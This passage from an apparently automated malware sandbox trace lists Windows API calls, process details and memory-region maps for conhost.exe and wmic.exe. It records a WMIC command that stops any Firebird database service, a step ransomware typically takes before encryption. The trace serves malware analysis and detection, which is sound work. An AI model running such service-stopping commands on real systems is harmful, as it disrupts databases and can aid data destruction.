(_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0096.126] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0096.126] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0096.126] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0096.126] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0096.126] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0096.126] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0096.126] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0096.126] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0096.126] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0096.126] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0096.127] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0096.127] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0096.127] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0096.127] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0096.127] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpCommandLine="WMIC SERVICE WHERE 'caption LIKE '%Firebird%'' CALL STOPSERVICE", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x4f2f288*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="WMIC SERVICE WHERE 'caption LIKE '%Firebird%'' CALL STOPSERVICE", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4f2f2d4 | out: lpCommandLine="WMIC SERVICE WHERE 'caption LIKE '%Firebird%'' CALL STOPSERVICE", lpProcessInformation=0x4f2f2d4*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x594, dwThreadId=0x9cc)) returned 1 [0096.269] CloseHandle (hObject=0xa4) returned 1 [0096.270] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0096.270] GetEnvironmentStringsW () returned 0x52d9f48* [0096.270] FreeEnvironmentStringsA (penv="=") returned 1 [0096.270] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0103.184] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x4f2f26c | out: lpExitCode=0x4f2f26c*=0x0) returned 1 [0103.184] CloseHandle (hObject=0xa8) returned 1 [0103.184] _vsnwprintf (in: _Buffer=0x4f2f354, _BufferCount=0x13, _Format="%08X", _ArgList=0x4f2f274 | out: _Buffer="00000000") returned 8 [0103.184] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0103.184] GetEnvironmentStringsW () returned 0x52d7de0* [0103.185] FreeEnvironmentStringsA (penv="=") returned 1 [0103.185] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0103.185] GetEnvironmentStringsW () returned 0x52d7de0* [0103.185] FreeEnvironmentStringsA (penv="=") returned 1 [0103.185] DeleteProcThreadAttributeList (in: lpAttributeList=0x4f2f300 | out: lpAttributeList=0x4f2f300) [0103.185] _get_osfhandle (_FileHandle=1) returned 0x3c [0103.185] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0103.185] _get_osfhandle (_FileHandle=1) returned 0x3c [0103.185] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0103.185] _get_osfhandle (_FileHandle=0) returned 0x38 [0103.185] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0103.185] SetConsoleInputExeNameW () returned 0x1 [0103.185] GetConsoleOutputCP () returned 0x1b5 [0103.185] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0103.186] SetThreadUILanguage (LangId=0x0) returned 0x409 [0103.186] exit (_Code=0) Thread: id = 45 os_tid = 0x8bc Process: id = "18" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x7914e000" os_pid = "0xbc0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "17" os_parent_pid = "0x2d0" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 838 start_va = 0x7f754000 end_va = 0x7f754fff entry_point = 0x0 region_type = private name = "private_0x000000007f754000" filename = "" Region: id = 839 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 840 start_va = 0x40dede0000 end_va = 0x40dedfffff entry_point = 0x0 region_type = private name = "private_0x00000040dede0000" filename = "" Region: id = 841 start_va = 0x40dee00000 end_va = 0x40dee13fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000040dee00000" filename = "" Region: id = 842 start_va = 0x40dee20000 end_va = 0x40dee5ffff entry_point = 0x0 region_type = private name = "private_0x00000040dee20000" filename = "" Region: id = 843 start_va = 0x7df5ffcb0000 end_va = 0x7ff5ffcaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffcb0000" filename = "" Region: id = 844 start_va = 0x7ff6c41c0000 end_va = 0x7ff6c41e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c41c0000" filename = "" Region: id = 845 start_va = 0x7ff6c41ea000 end_va = 0x7ff6c41eafff entry_point = 0x0 region_type = private name = "private_0x00007ff6c41ea000" filename = "" Region: id = 846 start_va = 0x7ff6c41ee000 end_va = 0x7ff6c41effff entry_point = 0x0 region_type = private name = "private_0x00007ff6c41ee000" filename = "" Region: id = 847 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 848 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 849 start_va = 0x40def00000 end_va = 0x40deffffff entry_point = 0x0 region_type = private name = "private_0x00000040def00000" filename = "" Region: id = 850 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 851 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 852 start_va = 0x40dede0000 end_va = 0x40dedeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000040dede0000" filename = "" Region: id = 853 start_va = 0x40dedf0000 end_va = 0x40dedf6fff entry_point = 0x0 region_type = private name = "private_0x00000040dedf0000" filename = "" Region: id = 854 start_va = 0x40dee60000 end_va = 0x40dee9ffff entry_point = 0x0 region_type = private name = "private_0x00000040dee60000" filename = "" Region: id = 855 start_va = 0x40deea0000 end_va = 0x40deea0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000040deea0000" filename = "" Region: id = 856 start_va = 0x40deeb0000 end_va = 0x40deeb6fff entry_point = 0x0 region_type = private name = "private_0x00000040deeb0000" filename = "" Region: id = 857 start_va = 0x40deec0000 end_va = 0x40deec0fff entry_point = 0x0 region_type = private name = "private_0x00000040deec0000" filename = "" Region: id = 858 start_va = 0x40deed0000 end_va = 0x40deed0fff entry_point = 0x0 region_type = private name = "private_0x00000040deed0000" filename = "" Region: id = 859 start_va = 0x40df000000 end_va = 0x40df0bdfff entry_point = 0x40df000000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 860 start_va = 0x40df220000 end_va = 0x40df22ffff entry_point = 0x0 region_type = private name = "private_0x00000040df220000" filename = "" Region: id = 861 start_va = 0x40df230000 end_va = 0x40df3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000040df230000" filename = "" Region: id = 862 start_va = 0x40df3c0000 end_va = 0x40df540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000040df3c0000" filename = "" Region: id = 863 start_va = 0x40df550000 end_va = 0x40e094ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000040df550000" filename = "" Region: id = 864 start_va = 0x7ff6c40c0000 end_va = 0x7ff6c41bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c40c0000" filename = "" Region: id = 865 start_va = 0x7ff6c41ec000 end_va = 0x7ff6c41edfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c41ec000" filename = "" Region: id = 866 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 867 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 868 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 869 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 870 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 871 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 872 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 873 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 874 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 875 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 876 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 877 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 42 os_tid = 0x758 Thread: id = 43 os_tid = 0x168 Thread: id = 44 os_tid = 0xf0 Process: id = "19" image_name = "wmic.exe" filename = "c:\\windows\\syswow64\\wbem\\wmic.exe" page_root = "0xf8d000" os_pid = "0x594" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "17" os_parent_pid = "0x2d0" cmd_line = "WMIC SERVICE WHERE 'caption LIKE '%Firebird%'' CALL STOPSERVICE" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 891 start_va = 0xc00000 end_va = 0xc1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c00000" filename = "" Region: id = 892 start_va = 0xc20000 end_va = 0xc21fff entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Region: id = 893 start_va = 0xc30000 end_va = 0xc43fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c30000" filename = "" Region: id = 894 start_va = 0xc50000 end_va = 0xc8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Region: id = 895 start_va = 0xc90000 end_va = 0xccffff entry_point = 0x0 region_type = private name = "private_0x0000000000c90000" filename = "" Region: id = 896 start_va = 0xcd0000 end_va = 0xcd3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cd0000" filename = "" Region: id = 897 start_va = 0xce0000 end_va = 0xce0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 898 start_va = 0xcf0000 end_va = 0xcf1fff entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 899 start_va = 0x1300000 end_va = 0x1363fff entry_point = 0x1300000 region_type = mapped_file name = "wmic.exe" filename = "\\Windows\\SysWOW64\\wbem\\WMIC.exe" (normalized: "c:\\windows\\syswow64\\wbem\\wmic.exe") Region: id = 900 start_va = 0x1370000 end_va = 0x536ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001370000" filename = "" Region: id = 901 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 902 start_va = 0x7f700000 end_va = 0x7f722fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f700000" filename = "" Region: id = 903 start_va = 0x7f727000 end_va = 0x7f727fff entry_point = 0x0 region_type = private name = "private_0x000000007f727000" filename = "" Region: id = 904 start_va = 0x7f728000 end_va = 0x7f728fff entry_point = 0x0 region_type = private name = "private_0x000000007f728000" filename = "" Region: id = 905 start_va = 0x7f72d000 end_va = 0x7f72ffff entry_point = 0x0 region_type = private name = "private_0x000000007f72d000" filename = "" Region: id = 906 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 907 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 908 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 909 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 910 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 911 start_va = 0xd70000 end_va = 0xd7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d70000" filename = "" Region: id = 912 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 913 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 914 start_va = 0xdb0000 end_va = 0xeaffff entry_point = 0x0 region_type = private name = "private_0x0000000000db0000" filename = "" Region: id = 915 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 916 start_va = 0xc00000 end_va = 0xc0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c00000" filename = "" Region: id = 917 start_va = 0xc10000 end_va = 0xc13fff entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 918 start_va = 0xd00000 end_va = 0xd3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d00000" filename = "" Region: id = 919 start_va = 0xeb0000 end_va = 0xf6dfff entry_point = 0xeb0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 920 start_va = 0xf70000 end_va = 0xfaffff entry_point = 0x0 region_type = private name = "private_0x0000000000f70000" filename = "" Region: id = 921 start_va = 0x11a0000 end_va = 0x11affff entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 922 start_va = 0x74a30000 end_va = 0x74a6efff entry_point = 0x74a30000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 923 start_va = 0x74b60000 end_va = 0x74b67fff entry_point = 0x74b60000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 924 start_va = 0x74b70000 end_va = 0x74b9ffff entry_point = 0x74b70000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 925 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 926 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 927 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 928 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 929 start_va = 0x77090000 end_va = 0x77249fff entry_point = 0x77090000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 930 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 931 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 932 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 933 start_va = 0x77ad0000 end_va = 0x77ad6fff entry_point = 0x77ad0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 934 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 935 start_va = 0x7f600000 end_va = 0x7f6fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f600000" filename = "" Region: id = 936 start_va = 0x7f72a000 end_va = 0x7f72cfff entry_point = 0x0 region_type = private name = "private_0x000000007f72a000" filename = "" Region: id = 937 start_va = 0x76f60000 end_va = 0x76f6bfff entry_point = 0x76f60000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 938 start_va = 0xc20000 end_va = 0xc20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c20000" filename = "" Region: id = 939 start_va = 0x77760000 end_va = 0x777e1fff entry_point = 0x77760000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 940 start_va = 0xd40000 end_va = 0xd40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d40000" filename = "" Region: id = 941 start_va = 0x74a20000 end_va = 0x74a2cfff entry_point = 0x74a20000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 942 start_va = 0x77930000 end_va = 0x7798bfff entry_point = 0x77930000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 943 start_va = 0x749b0000 end_va = 0x74a15fff entry_point = 0x749b0000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 944 start_va = 0x74af0000 end_va = 0x74b0afff entry_point = 0x74af0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 945 start_va = 0x5370000 end_va = 0x56a6fff entry_point = 0x5370000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 946 start_va = 0x77ba0000 end_va = 0x77c31fff entry_point = 0x77ba0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 947 start_va = 0xfb0000 end_va = 0x1098fff entry_point = 0xfb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 948 start_va = 0xd50000 end_va = 0xd53fff entry_point = 0x0 region_type = private name = "private_0x0000000000d50000" filename = "" Region: id = 949 start_va = 0x74820000 end_va = 0x749affff entry_point = 0x74820000 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\SysWOW64\\msxml3.dll" (normalized: "c:\\windows\\syswow64\\msxml3.dll") Region: id = 950 start_va = 0x56b0000 end_va = 0x58affff entry_point = 0x0 region_type = private name = "private_0x00000000056b0000" filename = "" Region: id = 951 start_va = 0x58b0000 end_va = 0x5aaffff entry_point = 0x0 region_type = private name = "private_0x00000000058b0000" filename = "" Region: id = 952 start_va = 0x5ab0000 end_va = 0x5caffff entry_point = 0x0 region_type = private name = "private_0x0000000005ab0000" filename = "" Region: id = 953 start_va = 0xfb0000 end_va = 0x113ffff entry_point = 0x0 region_type = private name = "private_0x0000000000fb0000" filename = "" Region: id = 954 start_va = 0xfb0000 end_va = 0x106ffff entry_point = 0x0 region_type = private name = "private_0x0000000000fb0000" filename = "" Region: id = 955 start_va = 0x1130000 end_va = 0x113ffff entry_point = 0x0 region_type = private name = "private_0x0000000001130000" filename = "" Region: id = 956 start_va = 0x11b0000 end_va = 0x128efff entry_point = 0x11b0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 957 start_va = 0x5cb0000 end_va = 0x60affff entry_point = 0x0 region_type = private name = "private_0x0000000005cb0000" filename = "" Region: id = 958 start_va = 0xd60000 end_va = 0xd60fff entry_point = 0xd60000 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\SysWOW64\\msxml3r.dll" (normalized: "c:\\windows\\syswow64\\msxml3r.dll") Region: id = 959 start_va = 0xd80000 end_va = 0xd9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d80000" filename = "" Region: id = 960 start_va = 0x746c0000 end_va = 0x7481ffff entry_point = 0x746c0000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 963 start_va = 0x743f0000 end_va = 0x746b0fff entry_point = 0x743f0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 964 start_va = 0x74d70000 end_va = 0x74eaffff entry_point = 0x74d70000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 965 start_va = 0x75080000 end_va = 0x750c3fff entry_point = 0x75080000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 966 start_va = 0x76ca0000 end_va = 0x76decfff entry_point = 0x76ca0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 967 start_va = 0x778a0000 end_va = 0x7792cfff entry_point = 0x778a0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 968 start_va = 0x77990000 end_va = 0x77a0afff entry_point = 0x77990000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 969 start_va = 0xfb0000 end_va = 0xfd9fff entry_point = 0xfb0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 970 start_va = 0x1060000 end_va = 0x106ffff entry_point = 0x0 region_type = private name = "private_0x0000000001060000" filename = "" Region: id = 971 start_va = 0x56b0000 end_va = 0x5837fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000056b0000" filename = "" Region: id = 972 start_va = 0x58a0000 end_va = 0x58affff entry_point = 0x0 region_type = private name = "private_0x00000000058a0000" filename = 